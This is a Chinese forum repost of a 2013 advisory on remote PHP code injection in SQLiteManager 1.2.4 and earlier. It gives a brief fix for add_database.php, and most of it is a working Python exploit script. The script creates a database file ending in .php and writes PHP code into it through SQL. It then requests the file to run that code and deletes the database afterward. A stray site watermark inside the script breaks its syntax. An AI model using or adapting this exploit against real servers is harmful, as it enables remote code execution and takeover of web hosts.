管理员
|
阅读:2411回复:0
SQLiteManager 1.2.4远程php代码注射
楼主#
更多
发布于:2013-01-29 13:55
 | |  |  | 概述:===============================================================标题: SQLiteManager 0Day Remote PHP Code Injection Vulnerability作者: RealGame开发者: http://www.Relagame.co.il下载地址: http://sourceforge.net/projects/sqlitemanager/影响版本 <=1.2.4测试系统: Windows XP, Debian 2.6.32-46===============================================================缺陷程序 Name: SQLiteManagerOfficial Site: http://www.sqlitemanager.org/ Name: AmppsOfficial Site: http://www.ampps.com/ Name: VertrigoServOfficial Site: http://vertrigo.sourceforge.net/===============================================================程序介绍Official Site: http://www.sqlitemanager.org/SQLiteManager is a database manager for SQLite databases. You can manageany SQLite database created on any platform with SQLiteManager.===============================================================Easy Way To Fix:Find: SQLiteStripSlashes($_POST['dbpath'])Replace: str_replace('.', '', SQLiteStripSlashes($_POST['dbpath']))On File: ./include/add_database.php=============================================================== import reimport urllib2from urllib import urlencodefrom sys import argv, exit def strip_tags(value): #Strip tags with RegEx return re.sub('<[^>]*?>', '', value) def getDbId(sqliteUrl, myDbName): #Find Components htmlRes = urllib2.urlopen(sqliteUrl, None, 120).read() if htmlRes: #If you found it take all the rows td = re.findall('<td class="name_db">(.*?)</td>', htmlRes, re.DOTALL) #Make a dict of stripped columns for element in td: if strip_tags(element) == myDbName: #Return Id return "".join(re.findall('\?dbsel=(.*?)"', element, re.DOTALL)) return None def main(): www.atcpu.com print \ 'SQLiteManager Exploit\n' + \ 'Made By RealGame\n' + \ 'http://www.RealGame.co.il\n' if len(argv) < 2: #replace('\\', '/') - To Do The Same In Win And Linux filename = argv[0].replace('\\', '/').split('/')[-1] print 'Execute Example: ' + filename + ' http://127.0.0.1/sqlite/\n' exit() sqliteUrl = argv[1] myDbName = "phpinfo" myDbFile = "phpinfo.php" #Create Database params = {'dbname' : myDbName, 'dbVersion' : '2', 'dbRealpath' : None, 'dbpath' : myDbFile, 'action' : 'saveDb'} urllib2.urlopen(sqliteUrl + "main.php", urlencode(params), 120) #Get Database ID dbId = getDbId(sqliteUrl + "left.php", myDbName) #If Database Created if dbId: #Create Table + Shell Creator params = {'DisplayQuery' : 'CREATE TABLE temptab ( codetab text );\n' + \ 'INSERT INTO temptab VALUES (\'<?php phpinfo(); unlink(__FILE__); ?>\');\n', 'sqlFile' : None, 'action' : 'sql', 'sqltype' : '1'} urllib2.urlopen(sqliteUrl + "main.php?dbsel=%s;table=temptab" %dbId, urlencode(params), 120) #Inject Code urllib2.urlopen(sqliteUrl + myDbFile, None, 120) #Remove Database urllib2.urlopen(sqliteUrl + "main.php?dbsel=%s;table=;view=;trigger=;function=;action=del" %dbId, None, 120) print 'Succeed' return print 'Failed' if __name__ == '__main__': main()
| |  | |  |
|
